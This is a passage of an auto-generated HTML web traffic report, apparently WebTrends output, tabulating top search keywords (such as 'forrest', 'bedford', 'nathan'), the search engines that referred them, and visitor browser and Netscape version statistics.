<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">pictures </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.46%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">preserve </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopSearchKeywords"><!--Referrers & Keywords::Top Search Keywords--></A>
<!-- WT_H1>Top Search Keywords</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Search Keywords</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->The first table identifies keywords which led the most visitors to the site (regardless of the search engine). The second table identifies, for each keyword, which search engines led visitors to the site.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, .3, 3.7, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Top Search Keywords</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Search Keywords</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Keywords</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Keywords found</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>forrest</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">110</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15.38%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>bedford</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">72</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10.06%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>nathan</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">71</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9.93%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>of</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">23</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.21%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>pictures</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.79%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>the</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>general</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.81%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>klan</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.53%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>klux</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.53%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>nathaniel</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.39%</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD> </TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Total Found for the Keywords Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>355</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>49.65%</B></TD>
</TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total of Keywords Found in the Log File</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>715</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, 2, 2, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Top Search Keywords with Engines Detail</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Search Keywords with Engines Detail</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Keywords</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Engines</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Searches</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>forrest </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">82</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.46%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.79%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Excite </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.55%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">AltaVista </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.55%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>bedford </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">58</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8.11%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.81%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">AltaVista </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>nathan </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">55</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7.69%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.09%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">AltaVista </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>of </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">21</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.93%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">AltaVista </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>pictures </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Excite </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.41%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.27%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">AltaVista </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>the </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.81%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.13%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>general </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.25%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Lycos </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.55%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>klan </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.53%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>klux </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.53%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>nathaniel </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">Yahoo </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.39%</TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopBrowsers"><!--Browsers & Platforms::Most Used Browsers--></A>
<!-- WT_H1>Most Used Browsers</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Most Used Browsers</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section identifies the most popular WWW Browsers used by visitors to the site. This information will only be displayed if your server is logging the browser/platform information.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index20.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Top Browsers</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Most Used Browsers</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Browser</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Microsoft Internet Explorer</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">46474</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">73.73%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6622</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netscape</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7085</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11.24%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">665</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Other Netscape Compatible</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1701</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.69%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">234</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Java 1.1</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1403</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.22%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">475</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>InternetSeer.com</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1383</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2.19%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1379</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Java1.1.3</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">780</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.23%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>FAST-WebCrawler/3.3 (crawler@fast.no; http://fast.no/support.php?c=faqs/crawler)</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">405</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.64%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">25</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>WebTV</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">376</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.59%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">93</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>FAST-WebCrawler/3.2 test</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">331</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.52%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">70</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Scooter-W3.1.2</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">293</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.46%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">212</TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total For Browsers Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>60231</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>95.56%</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>9777</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopNetscape"><!--Browsers & Platforms::Netscape Browsers--></A>
<!-- WT_H1>Netscape Browsers</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Netscape Browsers</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section gives you a breakdown of the various versions of Netscape browsers that visitors to the site are using.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index21.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=5 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>5, .3, 2.7, 1
, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Netscape Browsers</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Netscape Browsers</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Browser</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total Hits</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netscape 4.x</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6072</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">85.7%</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">344</TD></TR>
